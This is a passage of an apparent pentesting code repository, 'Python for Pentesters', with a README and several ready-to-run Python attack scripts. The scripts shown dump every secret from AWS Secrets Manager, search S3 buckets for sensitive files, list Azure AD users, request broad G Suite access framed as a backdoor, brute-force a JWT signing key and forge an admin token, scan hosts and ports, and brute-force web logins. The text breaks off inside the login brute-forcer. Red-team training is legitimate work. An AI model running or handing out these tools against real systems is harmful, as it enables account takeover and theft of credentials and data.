[ { "path": ".gitignore", "content": "# Byte-compiled / optimized / DLL files\r\n__pycache__/\r\n*.py[cod]\r\n*$py.class\r\n\r\n# C extensions\r\n*.so\r\n\r\n# Distribution / packaging\r\n.Python\r\nbuild/\r\ndevelop-eggs/\r\ndist/\r\ndownloads/\r\neggs/\r\n.eggs/\r\nlib/\r\nlib64/\r\nparts/\r\nsdist/\r\nvar/\r\nwheels/\r\npip-wheel-metadata/\r\nshare/python-wheels/\r\n*.egg-info/\r\n.installed.cfg\r\n*.egg\r\nMANIFEST\r\n\r\n# PyInstaller\r\n# Usually these files are written by a python script from a template\r\n# before PyInstaller builds the exe, so as to inject date/other infos into it.\r\n*.manifest\r\n*.spec\r\n\r\n# Installer logs\r\npip-log.txt\r\npip-delete-this-directory.txt\r\n\r\n# Unit test / coverage reports\r\nhtmlcov/\r\n.tox/\r\n.nox/\r\n.coverage\r\n.coverage.*\r\n.cache\r\nnosetests.xml\r\ncoverage.xml\r\n*.cover\r\n*.py,cover\r\n.hypothesis/\r\n.pytest_cache/\r\ncover/\r\n\r\n# Translations\r\n*.mo\r\n*.pot\r\n\r\n# Django stuff:\r\n*.log\r\nlocal_settings.py\r\ndb.sqlite3\r\ndb.sqlite3-journal\r\n\r\n# Flask stuff:\r\ninstance/\r\n.webassets-cache\r\n\r\n# Scrapy stuff:\r\n.scrapy\r\n\r\n# Sphinx documentation\r\ndocs/_build/\r\n\r\n# PyBuilder\r\ntarget/\r\n\r\n# Jupyter Notebook\r\n.ipynb_checkpoints\r\n\r\n# IPython\r\nprofile_default/\r\nipython_config.py\r\n\r\n# pyenv\r\n# For a library or package, you might want to ignore these files since the code is\r\n# intended to run in multiple environments; otherwise, check them in:\r\n# .python-version\r\n\r\n# pipenv\r\n# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.\r\n# However, in case of collaboration, if having platform-specific dependencies or dependencies\r\n# having no cross-platform support, pipenv may install dependencies that don't work, or not\r\n# install all needed dependencies.\r\n#Pipfile.lock\r\n\r\n# PEP 582; used by e.g. github.com/David-OConnor/pyflow\r\n__pypackages__/\r\n\r\n# Celery stuff\r\ncelerybeat-schedule\r\ncelerybeat.pid\r\n\r\n# SageMath parsed files\r\n*.sage.py\r\n\r\n# Environments\r\n.env\r\n.venv\r\nenv/\r\nvenv/\r\nENV/\r\nenv.bak/\r\nvenv.bak/\r\nScripts/\r\ntcl/\r\nInclude/\r\nshare/\r\n\r\n# Spyder project settings\r\n.spyderproject\r\n.spyproject\r\n\r\n# Rope project settings\r\n.ropeproject\r\n\r\n# mkdocs documentation\r\n/site\r\n\r\n# mypy\r\n.mypy_cache/\r\n.dmypy.json\r\ndmypy.json\r\n\r\n# Pyre type checker\r\n.pyre/\r\n\r\n# pytype static type analyzer\r\n.pytype/" }, { "path": "LICENSE", "content": "MIT License\r\n\r\nCopyright (c) 2020 ustayready\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n" }, { "path": "README.md", "content": "Python for Pentesters\r\n==================\r\n\r\n## Overview ##\r\nGetting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started.\r\n\r\n**Brought to you by:**\r\n\r\n![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png \"Black Hills Information Security\")\r\n\r\n## Examples: by Mike Felch (@ustayready) and Joff Thyer (@joff_thyer) ##\r\nThis code is provided purely for educational purposes.\r\n\r\n * pivot_winrm.py: shows how to use Python with winrm to execute commands on a remote machine\r\n * cloud_aws_s3.py: search AWS S3 buckets for sensitive filenames\r\n * cloud_aws_secrets.py: Dump all the secrets in AWS Secrets Manager\r\n * cloud_azure_ad.py: Dumping AzureAD users\r\n * cloud_gsuite_backdoor.py: Backdooring G Suite accounts for full access\r\n * cloud_gsuite_email.py: Reading GMail emails\r\n * crack_jwt.py: Cracking JSON web tokens\r\n * live_host_discovery.py: Discovering live hosts on a network\r\n * live_port_discovery.py: Discovering open ports on a host\r\n * passwords_attack.py: Trying username/password combinations on a web authentication portal\r\n * pivot_psremoting.py: Pivoting in a Windows environment using PSRemoting\r\n * pivot_wmi.py: Pivoting in a Windows environment using WMI\r\n * shodan_search.py: Searching for internet connected devices on Shodan\r\n * socket_c2_client.py: C2 socket client\r\n * socket_c2_server.py: C2 socket server\r\n * web_brute.py: Brute forcing web paths for unknown attack surfaces\r\n * web_robots.py: Downloading the robots.txt for URLs\r\n * web_sniff.py: Sniffing HTTP packets\r\n * web_spa.py: Interacting with a single page app with a headless browser then copying session cookies to the requests library\r\n * pymeta.py: Read all files in a directory recursively and extracts metadata from any office documents, and PDFs discovered\r\n * powerstrip.py: Strips comments out of a PowerShell script, and writes a file with -stripped as part of the filename\r\n * pyinjector.py: Using ctypes to execute shellcode within the same process or inject into a remote process using thread manipulation\r\n\r\n\r\n\r\n\r\n\r\n" }, { "path": "aws_services.txt", "content": "AccessAnalyzer \r\nACM \r\nACMPCA \r\nAlexaForBusiness \r\nAmplify \r\nAPIGateway \r\nApiGatewayManagementApi \r\nApiGatewayV2 \r\nAppConfig \r\nApplicationAutoScaling \r\nApplicationInsights \r\nAppMesh \r\nAppStream \r\nAppSync \r\nAthena \r\nAutoScaling \r\nAutoScalingPlans \r\nBackup \r\nBatch \r\nBudgets \r\nCostExplorer \r\nChime \r\nCloud9 \r\nCloudDirectory \r\nCloudFormation \r\nCloudFront \r\nCloudHSM \r\nCloudHSMV2 \r\nCloudSearch \r\nCloudSearchDomain \r\nCloudTrail \r\nCloudWatch \r\nCodeBuild \r\nCodeCommit \r\nCodeDeploy \r\nCodeGuruReviewer \r\nCodeGuruProfiler \r\nCodePipeline \r\nCodeStar \r\nCodeStarconnections \r\nCodeStarNotifications \r\nCognitoIdentity \r\nCognitoIdentityProvider \r\nCognitoSync \r\nComprehend \r\nComprehendMedical \r\nComputeOptimizer \r\nConfigService \r\nConnect \r\nConnectParticipant \r\nCostandUsageReportService \r\nDataExchange \r\nDataPipeline \r\nDataSync \r\nDAX \r\nDetective \r\nDeviceFarm \r\nDirectConnect \r\nApplicationDiscoveryService \r\nDLM \r\nDatabaseMigrationService \r\nDocDB \r\nDirectoryService \r\nDynamoDB \r\nDynamoDBStreams \r\nEBS \r\nEC2 \r\nEC2InstanceConnect \r\nECR \r\nECS \r\nEFS \r\nEKS \r\nElasticInference \r\nElastiCache \r\nElasticBeanstalk \r\nElasticTranscoder \r\nElasticLoadBalancing \r\nElasticLoadBalancingv2 \r\nEMR \r\nElasticsearchService \r\nEventBridge \r\nFirehose \r\nFMS \r\nForecastService \r\nForecastQueryService \r\nFraudDetector \r\nFSx \r\nGameLift \r\nGlacier \r\nGlobalAccelerator \r\nGlue \r\nGreengrass \r\nGroundStation \r\nGuardDuty \r\nHealth \r\nIAM \r\nimagebuilder \r\nImportExport \r\nInspector \r\nIoT \r\nIoTDataPlane \r\nIoTJobsDataPlane \r\nIoT1ClickDevicesService \r\nIoT1ClickProjects \r\nIoTAnalytics \r\nIoTEvents \r\nIoTEventsData \r\nIoTSecureTunneling \r\nIoTThingsGraph \r\nKafka \r\nkendra \r\nKinesis \r\nKinesisVideoArchivedMedia \r\nKinesisVideoMedia \r\nKinesisVideoSignalingChannels \r\nKinesisAnalytics \r\nKinesisAnalyticsV2 \r\nKinesisVideo \r\nKMS \r\nLakeFormation \r\nLambda \r\nLexModelBuildingService \r\nLexRuntimeService \r\nLicenseManager \r\nLightsail \r\nCloudWatchLogs \r\nMachineLearning \r\nMacie \r\nManagedBlockchain \r\nMarketplaceCatalog \r\nMarketplaceEntitlementService \r\nMarketplaceCommerceAnalytics \r\nMediaConnect \r\nMediaConvert \r\nMediaLive \r\nMediaPackage \r\nMediaPackageVod \r\nMediaStore \r\nMediaStoreData \r\nMediaTailor \r\nMarketplaceMetering \r\nMigrationHub \r\nMigrationHubConfig \r\nMobile \r\nMQ \r\nMTurk \r\nNeptune \r\nNetworkManager \r\nOpsWorks \r\nOpsWorksCM \r\nOrganizations \r\nOutposts \r\nPersonalize \r\nPersonalizeEvents \r\nPersonalizeRuntime \r\nPI \r\nPinpoint \r\nPinpointEmail \r\nPinpointSMSVoice \r\nPolly \r\nPricing \r\nQLDB \r\nQLDBSession \r\nQuickSight \r\nRAM \r\nRDS \r\nRDSDataService \r\nRedshift \r\nRekognition \r\nResourceGroups \r\nResourceGroupsTaggingAPI \r\nRoboMaker \r\nRoute53 \r\nRoute53Domains \r\nRoute53Resolver \r\nS3 \r\nS3Control \r\nSageMaker \r\nAugmentedAIRuntime \r\nSageMakerRuntime \r\nSavingsPlans \r\nSchemas \r\nSimpleDB \r\nSecretsManager \r\nSecurityHub \r\nServerlessApplicationRepository \r\nServiceQuotas \r\nServiceCatalog \r\nServiceDiscovery \r\nSES \r\nSESV2 \r\nShield \r\nsigner \r\nSMS \r\nPinpointSMSVoice \r\nSnowball \r\nSNS \r\nSQS \r\nSSM \r\nSSO \r\nSSOOIDC \r\nSFN \r\nStorageGateway \r\nSTS \r\nSupport \r\nSWF \r\nTextract \r\nTranscribeService \r\nTransfer \r\nTranslate \r\nWAF \r\nWAFRegional \r\nWAFV2 \r\nWorkDocs \r\nWorkLink \r\nWorkMail \r\nWorkMailMessageFlow \r\nWorkSpaces \r\nXRay " }, { "path": "cloud_aws_s3.py", "content": "from botocore.exceptions import ClientError\r\nimport boto3\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(access_key, secret_access_key, query):\r\n\tsession = boto3.Session(\r\n\t\taws_access_key_id=access_key,\r\n\t\taws_secret_access_key=secret_access_key,\r\n\t)\r\n\r\n\ts3 = session.resource('s3')\r\n\tfor bucket in s3.buckets.all():\r\n\t\tprint('Enumerating bucket: {}'.format(bucket.name))\r\n\t\tfor key in bucket.objects.all():\r\n\t\t\tif query in key.key:\r\n\t\t\t\tprint('[-] Found gold: {}'.format(key.key))\r\n\r\nif __name__ == '__main__':\r\n\taccess_key = sys.argv[1]\r\n\tsecret_access_key = sys.argv[2]\r\n\tquery = sys.argv[3]\r\n\r\n\tmain(access_key, secret_access_key, query)\r\n" }, { "path": "cloud_aws_secrets.py", "content": "import boto3\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef leak_secrets(access_key, secret_access_key, region_name):\r\n\tsession = boto3.Session(\r\n\t\taws_access_key_id=access_key,\r\n\t\taws_secret_access_key=secret_access_key,\r\n\t\tregion_name=region_name,\r\n\t)\r\n\tclient = session.client(service_name='secretsmanager')\r\n\r\n\tresponse = client.list_secrets()\r\n\tfor secret in response['SecretList']:\r\n\t\tsecret_name = secret['Name']\r\n\t\tsecret_desc = secret['Description']\r\n\r\n\t\tsecret_val_resp = client.get_secret_value(SecretId=secret_name)\r\n\r\n\t\tprint('{}: {}'.format(secret_name, secret_desc))\r\n\t\t\r\n\t\tif 'SecretString' in secret_val_resp:\r\n\t\t\tsecret_val = secret_val_resp['SecretString']\r\n\t\t\tprint(secret_val)\r\n\t\telse:\r\n\t\t\tprint('Binary Data Found!')\r\n\r\nif __name__ == '__main__':\r\n\taccess_key = sys.argv[1]\r\n\tsecret_access_key = sys.argv[2]\r\n\tregion_name = sys.argv[3]\r\n\r\n\tleak_secrets(access_key, secret_access_key, region_name)\r\n\r\n\r\n\r\n" }, { "path": "cloud_azure_ad.py", "content": "from msrestazure.azure_active_directory import AADTokenCredentials\r\nimport adal\r\nimport requests\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(domain, client_id, client_secret):\r\n\turl = 'https://login.microsoftonline.com/{}/oauth2/v2.0/token'.format(domain)\r\n\tdata = {\r\n\t\t'grant_type': 'client_credentials',\r\n\t\t'client_id': client_id,\r\n\t\t'scope': 'https://graph.microsoft.com/.default',\r\n\t\t'client_secret': client_secret,\r\n\t}\r\n\tr = requests.post(url, data=data)\r\n\ttoken = r.json().get('access_token')\r\n\r\n\turl_users = 'https://graph.microsoft.com/v1.0/users'\r\n\t#url_groups = 'https://graph.microsoft.com/beta/groups'\r\n\theaders = {\r\n\t\t'Content-Type' : 'application\\\\json',\r\n\t\t'Authorization': 'Bearer {}'.format(token)\r\n\t}\r\n\tr = requests.get(url_users, headers=headers)\r\n\tresult = r.json()\r\n\tprint(result)\r\n\r\nif __name__ == '__main__':\r\n\tdomain = sys.argv[1]\r\n\tclient_id = sys.argv[2]\r\n\tclient_secret = sys.argv[3]\r\n\tmain(domain, client_id, client_secret)" }, { "path": "cloud_gsuite_backdoor.py", "content": "#!/usr/bin/env python\r\nimport os\r\nfrom oauth2client import client, tools\r\nfrom oauth2client.file import Storage\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/calendar https://mail.google.com/ https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/groups https://www.googleapis.com/auth/admin.directory.user'\r\n\r\ndef get_credentials():\r\n\tcredential_dir =os.getcwd()\r\n\tclient_secret_path = os.path.join(credential_dir, 'client_secrets.json')\r\n\tsaved_secret_path = os.path.join(credential_dir, 'saved_creds.json')\r\n\r\n\tstore = Storage(saved_secret_path)\r\n\tcredentials = store.get()\r\n\tif not credentials or credentials.invalid:\r\n\t\tflow = client.flow_from_clientsecrets(client_secret_path, SCOPES, redirect_uri='http://localhost')\r\n\t\turl = flow.step1_get_authorize_url()\r\n\t\tflags = tools.argparser.parse_args(args=[])\r\n\t\tflags.noauth_local_webserver = True\r\n\t\tcredentials = tools.run_flow(flow, store, flags=flags)\r\n\treturn credentials\r\n\r\nif __name__ == \"__main__\":\r\n\tget_credentials()" }, { "path": "cloud_gsuite_email.py", "content": "from googleapiclient.discovery import build\r\nfrom httplib2 import Http\r\nfrom oauth2client import file, client, tools\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\r\n\r\ndef main():\r\n\tstore = file.Storage('token.json')\r\n\tcreds = store.get()\r\n\tif not creds or creds.invalid:\r\n\t\tflow = client.flow_from_clientsecrets('credentials.json', SCOPES)\r\n\t\tcreds = tools.run_flow(flow, store)\r\n\tservice = build('gmail', 'v1', http=creds.authorize(Http()))\r\n\t\r\n\tresults = service.users().messages().list(userId='me',labelIds = ['INBOX']).execute()\r\n\tmessages = results.get('messages', [])\r\n\r\n\tfor message in messages:\r\n\t\tmsg = service.users().messages().get(userId='me', id=message['id']).execute()\r\n\t\tprint(msg['snippet'])\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n\r\n\r\n\r\n\r\n\t" }, { "path": "crack_jwt.py", "content": "import sys\r\nimport jwt\r\nimport requests\r\nimport time\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url, password_file):\r\n\tresponse = requests.get(url, headers={'user-agent':'pentest'})\r\n\r\n\tif 'session' in response.cookies:\r\n\t\ttoken = response.cookies['session']\r\n\t\tprint(f'Old Token: {token}\\n')\r\n\t\twith open(password_file,'r') as file:\r\n\t\t\tpasswords = [x.strip() for x in file.readlines()]\r\n\t\t\tfor password in passwords:\r\n\t\t\t\tsuccess = decode_jwt(token, password)\r\n\t\t\t\tif success:\r\n\t\t\t\t\tnew_session = exploit(token, password)\r\n\t\t\t\t\tcook = { 'session': new_session }\r\n\t\t\t\t\tnew_request = requests.get(url,cookies=cook, headers={'user-agent':'pentest'})\r\n\t\t\t\t\tprint(new_request.text)\r\n\t\t\t\t\tbreak\r\n\r\ndef exploit(token, password):\r\n\tdecoded = jwt.decode(token, password)\r\n\tdecoded['user_id'] = 'admin'\r\n\tdecoded['is_admin'] = 'true' \r\n\tencoded = jwt.encode(decoded,password).decode('utf-8')\r\n\tprint(f'New Token: {encoded}\\n')\r\n\treturn encoded\r\n\r\ndef decode_jwt(token, password):\r\n\ttry:\r\n\t\tdecoded = jwt.decode(token, password)\r\n\t\tprint(f'Password found! {password}\\n')\r\n\t\treturn True\r\n\texcept:\r\n\t\treturn False\r\n\r\nif __name__ == '__main__':\r\n\turl = sys.argv[1]\r\n\tpassword_file = sys.argv[2]\r\n\t\r\n\tmain(url, password_file)\r\n" }, { "path": "live_host_discovery.py", "content": "from ping3 import ping\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host):\r\n\tttl = ping(host)\r\n\tif ttl:\r\n\t\tprint(f'{host} is alive.')\r\n\telse:\r\n\t\tprint(f'{host} is NOT alive.')\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\r\n\tmain(host)" }, { "path": "live_port_discovery.py", "content": "import socket\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host,ports):\r\n\tscan_range = []\r\n\tscan_results = []\r\n\r\n\tif '-' in ports:\r\n\t\tstart_port, stop_port = ports.split('-')\r\n\t\tfor port in range(int(start_port), int(stop_port)+1):\r\n\t\t\tscan_range.append(port)\r\n\telif ',' in ports:\r\n\t\tfor port in ports.split(','):\r\n\t\t\tport = int(port.strip())\r\n\t\t\tscan_range.append(port)\r\n\telse:\r\n\t\tscan_range.append(int(ports))\r\n\t\tscan_range.append(int(ports)+1)\r\n\r\n\tscan_range = check_ports(host, scan_range)\r\n\r\ndef check_ports(host, ports):\r\n\tport_results = []\r\n\tfor port in ports:\r\n\t\ttry:\r\n\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\t\tresult = sock.connect_ex((host, port))\r\n\t\t\tif result == 0:\r\n\t\t\t\tprint(f'{host} -> {port}: up')\r\n\t\t\t\tport_results.append((port, True))\r\n\t\t\tsock.close()\r\n\t\texcept Exception as ex:\r\n\t\t\tprint(f'{host} -> {port}: down')\r\n\t\t\tport_results.append((port, False))\r\n\treturn port_results\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\tport_range = sys.argv[2]\r\n\tmain(host, port_range)" }, { "path": "passwords_attack.py", "content": "import requests\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url, user_file, password_file):\r\n\tusers = []\r\n\tpasswords = []\r\n\r\n\twith open(user_file, 'r') as u_file:\r\n\t\tusers = [x.strip() for x in u_file.readlines()]\r\n\r\n\twith open(password_file, 'r') as p_file:\r\n\t\tpasswords = [x.strip() for x in p_file.readlines()]\r\n\r\n\tfor user in users:\r\n\t\tprint(f'Trying username: {user}')\r\n\t\tfor password in passwords:\r\n\t\t\tresult = check_auth(url, user, password)\r\n\t\t\tif result:\r\n\t\t\t\tprint(f'Success! {user} -> {password}')\r\n\r\ndef check_auth(url, user, password):\r\n\tcustom_headers = {'user-agent':'custom agent'}\r\n\tpayload = {'username':user, 'password':password}\r\n\tresponse = requests.post(url, 